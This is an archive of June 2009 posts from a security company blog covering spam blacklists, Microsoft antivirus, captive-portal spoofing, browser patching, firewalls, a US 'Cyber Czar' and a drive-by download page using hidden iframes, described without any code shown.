Thursday, June 25, 2009

State of the industry – June 2009

As the month comes to an end, there were a few interesting happenings of late that I wanted to comment on. First is the state of the spam blacklist SORBS. Apparently the University of Queensland wants to stop hosting SORBS, so SORBS is looking for a new home to immediately host their full 42RU rack of servers and enough bandwidth to cover their 30 billion DNS queries each day. Apparently SORBS has a checkered past, with many feeling that a closure of SORBS would be a good thing since the service apparently incorporates political and other questionable motivation that compromises its technical value. My thought? Spammers should be clamoring to host/buy it (discretely, of course). Think about it: make sure all of your competition is listed, and don't list yourself. Your spam gets a free ticket through the first line of spam defense. If spam is really that lucrative, then buying/hosting SORBS would make financial sense.

Next is the state of Microsoft's anti-virus efforts. Many AV industry experts claim that Microsoft's entry into the AV market would be laughable and minimal. Indeed, Microsoft's previous OneCare suite
left a lot to be desired. But according to AV-Test, Microsoft's new Security Essentials (codename "Morro") actually holds its own (well, the beta version at least). There was also speculation that Microsoft's AV scanner would be cloud-based, but it's confirmed to be a traditional local client application. The Security Essentials site indicates that no more beta downloads are being offered at this time, so we'll probably need to just wait for a full release later this year. In the meantime, Microsoft's AV efforts are readily apparent on their Malware Protection Center page. Also interesting is the quote by the CEO of AVG, another anti-virus company, in the previously linked ComputerWorld article. He basically says that viruses are so yesterday, and incoming web nasties and malware such as browser exploits are the big threats now. True.

Lastly is the state of
man-in-the-middle attacks on public networks. Have you ever noticed that things like wireless hotpots and hotel networks are a huge catch-22 for trust and network security? You connect to a network and get assigned IP, DNS, and routing information from a DHCP server that may or may not be the legitimate DHCP server. Then you could come to a captive portal page that may or may not be the legitimate captive portal. The captive portal page says you must enter in various information (Room number? Credit card? T-mobile login? Daily access code?) before you can use the network, but the information it requests may or may not be the legitimate information that is necessary. And that's assuming you even connected to the legitimate wireless AP in the first place (see more than one AP broadcasting the same SSID? Yeah...) Even SSL doesn't help here, because different places use different hostnames for their captive portal service...so you have no idea whether https://secure.FooBarHotelNetworkServices.com/captiveportal/sheraton/ is the right place or not when asked for your credit card number to get Internet access. An attacker can register any legitimate-looking domain name, get an SSL cert for it, and run their attack, and you would never know. ("Hello? Front desk? Can you please tell me the exact hostname for your captive portal, and whether or not I will need to enter in a credit card number to get Internet access?") In a world of laptop cellular aircards and mobile phone tethering, they are a much safer bet these days.

Until next time,
- Jeff

Friday, June 19, 2009

The most important things on the Internet...A through Z

You may have noticed that Google's front page implements a style of auto-completion as you type in your query, ranked by popularity (although maybe it's not popularity, but it's definitely not relevance; I'm just assuming it is popularity). I've always been amused at what pops up after I type in a word or two, but today I was more curious than usual and started looking at the top terms for shorter and shorter word fragments. Eventually, I sparked on the idea of the most popular terms for the letters A through Z. So, without delay, here they are!

Amazon
Best buy
Craigslist
Dictionary
Ebay
Facebook
Gmail
Hotmail
Irs
Jcpenney
Kohls
Lowes
Myspace
Netflix
Orbitz
Photobucket
Quotes
Realtor.com
Southwest airlines
Target
Usps
Verizon wireless
Walmart
Xm radio
Youtube
Zillow

Other than 'Quotes' and 'Dictionary', the remaining words are large well-known sites or brands. We sure do live in a commerce and media-driven world, don't we? Hopefully people aren't using Google to find out the web address of Youtube; it reminds me of
the Little Rascals quote "Quick, what's the number for 911?"

I've also noticed that the results can vary at different times, so the list you get might be slightly (or majorly) different. And different languages/locales provide different results (I just checked with www.google.fr). Which I suppose adds to the fun. I'll also leave the list of numbers (0-9) for you to look up yourself. Oh, the suspense!

Until next time,
- Jeff

Monday, June 15, 2009

Patches, auto-updating, and convenience

June has been a busy month for web-centric security patches. Microsoft fixed 31 different vulnerabilities (many affecting IE and Office), Adobe patches critical vulnerabilities in Adobe Acrobat and QuickTime, Google plugged some WebKit holes in Chrome, Apple released over 50 security fixes for Safari, and Firefox had 11 security vulnerabilities fixed, half of which were rated critical. With a lineup like this, a majority of the world is going to need to install patches to keep safe.

Despite the patches being available, history has shown that people don't always install them. Installing patches is an inconvenience; it interrupts the use of the system and potentially requires reboots. In enterprise environments, all of this can be semi-automated with patch management and deployment systems, centralized patch repositories like WSUS, and policies that dictate the employee just sit tight while mandatory patches are applied. But for home users, computer use is often casual--which means convenience has a very strong influence. If they get on the computer to check email or surf MySpace, they are likely to not want to postpone those computing desires in order to deal with installing patches first. That's assuming they even know about the availability of patches in the first place.

Recently
some folks from Google and their partners released an analysis of web browser auto-update approaches. The analysis looked at the different effectiveness of how quickly patches gained widespread deployment due to the different patching processes they offer. For example, Chrome does "silent updates"--it will download patches/new versions and automatically install them without telling you. Firefox will automatically download updates, but then you have to still manually agree to the installation via a prompt given to you by Firefox. Safari tells you that an update is available, but then you have to manually agree to download and then install the update. Opera will inform you of a new version, but then you have to manually download the update yourself and proceed through the install wizard. Internet Explorer relies on Windows Automatic Update agent to download and install patches.

Overall, the Google analysis found that Chrome’s silent update approach resulted in the widest spread of update deployment (97% of systems patched/updated) within a fixed period (three weeks). Firefox wound up with 85% of systems patched/updated after three weeks, and Safari and Opera wound up with some pretty low numbers. The conclusion? Badgering the user to be involved in the update process causes them to interrupt, abort, or ignore the process, leaving the patches/updates unapplied. That is non-ideal when security is involved.

But just because there are auto-update mechanisms available (Chrome, Windows), doesn't solve the problem per se. I've encountered situations on numerous occasions where the user has disabled the automatic updating process because the software they were using was, well, "borrowed." Microsoft has been struggling with this issue for years now: whether to allowed pirated copies of Windows to be eligible for service pack updates and other patches. They have slipped various anti-piracy checks into their update process under the moniker Windows Genuine Advantage, which means only legitimate copies of Windows have access to the collection of updates. But even if the software vendor doesn't implement technical restrictions to prevent pirated versions from updates, the user's conscience might still prevent it. A person who "borrows" a commercial software application from their friend is less likely to run to the vendor asking for support and updates, because they do not want to get their friend in trouble for handing out pirated copies; so such people are more likely to disable anything that automatically alerts the vendor to the second copy, and/or will ignore any updates (where they might be asked how they got the software in the first place) and just stick with the original (now outdated and insecure) version.

Overall this whole timely security patching business is a tough problem to solve, because it's not simply just a matter of expecting users to download an installation file off a website and double-clicking it.

Until next time,
- Jeff

Friday, June 12, 2009

Perimeter Security Lately

Back in the day, firewalls were all the rage. The bad stuff was outside, the good stuff was inside, and the firewall was the line between them. I haven't heard anyone seriously advocating the 'crunchy shell, chewy center' model for many years, and there is more than one long-standing list of anti-firewall arguments, plus recurring questions about where, exactly, the perimeter is anyway. Yet most corporations still use them, in one form or another. Why?

For one thing, a filter (a module or device that only some things go through, but others don't) is a very basic security technology. Just as there are a limited number of elements in the periodic table, there
are a very limited number of basic security technologies, so even when people are building "new" security technology, the most basic pieces to pick from are limited, and you'll see a lot of repeats. Since firewall is a pretty well-known word that covers several members of this family, any filtering technology that works on traffic of some sort (whether it be a packet filter or a web application firewall) will tend to be called a firewall, even though firewalls now frequently work much higher up the stack than they did in the 80s.

So the real question is, what good is a filter installed on a perimeter? Most people will say it's for defense in depth, i.e. "We know it's not perfect, but we're hoping each layer will catch some different things and minimize the bad stuff that gets all the way through." It's the stock answer, and I wouldn't argue against the concept, but I think it misses a key point:

In a network, filters (including firewalls) break what can be enormously complex into smaller, more manageable pieces. It's like providing an API and using it to write modular code. The goal is to minimize the cases in which tweaking something over here wiggles something unexpected way over there. Sounds good for maintainability, but what does reducing action-at-a-distance have to do with security? Here we go back to design flaws. If the designer wasn't expecting anything else to be using or modifying some resource, but something else can, there could well be an exploitable design flaw. A well-configured filter in a good location can reduce the possibility of interaction, and therefore the chance the design flaw will be exploitable. Plus, partitioning any system means you can partition security analysis: each portion, the partitions, and any possible interactions between them. Without the partitions, it's all interactions, which are the least-well-understood security analysis subject I can think of.


These days, you have more perimeters than you think, and the things you are dividing aren't necessarily more adversarial to each other than they are internally. But at least if you divide them, you have smaller chunks to worry about.

-- Brenda

Monday, June 8, 2009

What we need in a Cyber Czar

Recently, President Obama announced the establishment of a Cyber Czar, although the candidate for the position has not yet been named. The new position, will be a senior white house staffer, regularly reporting to the President. This position is an important one and I’d like to see the President make the right choice. Mr. Obama, I know that you’re a busy guy but here’s some friendly advice while mulling over the candidates.

Forbes asked the question – “should the head of cybersecurity in the new administration come from private industry, government or the military?”. The article debates the merits of each approach and discusses a few potential candidates. The answer, in my opinion couldn’t be more clear. The candidate must come from private industry but must know how to dance in government circles. I was encouraged this past weekend when the administration named Jeff Moss, founder of the Black Hat security conferences to the Homeland Security Advisory Council. It demonstrates a willingness to reach beyond political circles for candidates with real world experience. Jeff is an excellent choice having seen the world through the eyes of both a hacker and a businessman, not to mention being one of the best connected people in the security industry.

Selecting a candidate for Cyber Czar from private industry is critical because the answer doesn’t lie in small tweaks to the status quo but in wholesale change. The current state of security in government networks is abysmal and the government just doesn’t do change well. When the attackers are succeeding in stealing top secret plans for fighter jets, the air traffic control system is wide open to attack and the power grid is littered with backdoors, incremental changes won’t suffice. Moreover, the government can’t secure their infrastructure alone. They don’t make the technology that they run, nor do they independently have the expertise necessary to secure the massive infrastructure that Americans rely on each and every day. The soon to be named Cyber Czar needs to come from private industry but be politically savvy. Having served in the government at some point in his/her career would be a great asset as let’s face it, politics is a game and if you don’t know the rules, you won’t succeed.

This isn’t the first time that the Whitehouse has called upon an outsider to help secure the nation’s IT infrastructure. In September 2003, Amit Yoran, founder of RipTech was handed the title of Director of the National Cyber Security Division of the Department of Homeland Security. Despite the impressive title, the position was not in the Whitehouse, and came with limited power. Many speculate that Yoran left after only a year on the job after growing frustrated that he was unable to implement the changes that he sought. Unfortunately, despite the announcement from the President that that the Cyber Czar will have a Whitehouse position, we still don’t know exactly what powers the office will wield. If we expect change, the Cyber Czar will need the ear of the President and the power to make change happen. If not, the position will wind up being a revolving door for bright minds with great ideas who soon grow frustrated with the red tape pinning them down.

Mr. President, this is an important opportunity. Please be sure and bring on board an outsider who is a visionary with the patience to play the political game. But most importantly, be sure to listen to him.

Sunday, June 7, 2009

Page is loading… Please wait

Web access is a critical activity for virtually all jobs, but how many employees recognize the risks that can be encountered simply by viewing a web page? How many times have you encountered web pages with a title such as “Page is loading… Please wait”? I’ve already talked about the threats posed by Phishing and ActiveX vulnerabilities in previous blogs. Another significant threat on the web is the increasingly popular drive-by download attack. In this attack, malicious software is downloaded without user knowledge by exploiting known/unknown web browser or opreating system vulnerabilities. Recently, we came across an interesting website hosting malicious animated page. The page shows animation that will entice the victim to wait patiently while content is supposedly being loaded on the page. Below is a screen capture of the page in question.

When someone visits this web page, it will continually play the ‘page is loading…’ animation and nothing will ever be displayed on the page. The victim will undoubtedly grow impatient and eventually close the page and continue surfing. But wait; did the victim notice what else was being loaded? Of course not as the malicious content was loaded in the background. Yes, the page actually contains a couple of malicious iframes,

Looking at the above code, there are two hidden malicious iframes, one is clearly shown in text format and other is obfuscated. Those hidden iframes actually point to malicious websites hosting the “LuckySploit” attack toolkit. This is another type of exploit toolkit, which takes the advantage of different types of critical vulnerabilities to download additional malware. This toolkit is more advanced than the older Mpack, Icepack, etc. toolkits. Finjan’s blog has provided detail on this new attack toolkit. After visiting the above page, the malicious website sends obfuscated JavaScript which exploits vulnerabilities, if present and downloads additional malicious binaries. The packet capture for obfuscated JavaScript is shown below,

The attacker has done his job behind the page by downloading malicious binaries without the user noticing. These attack toolkits spread by injecting malicious hidden iframes into otherwise legitimate sites. Once the victim visits those sites, they are redirected to attacker’s website. Social engineering can also be employed to convince victims to directly visit malicious sites controlled by the attakers. The frightening part of these attacks is that the victim does not have to do anything. They simply visit the malicious page and everything runs in the background. Such malicious sites are increasing every day with advanced techniques and with the help of different novel ways to spread malware. Browser patch management is critical for those enterprises seeking to defend against such attacks.

We have observed that number of websites that are infected by hidden malicious iframes and the latest ones include attacks carried out LuckySploit and Gumblar. We recommend you to keep your antivirus updated and keep your eye on such suspicious websites while surfing.

Happy surfing!!!

Umesh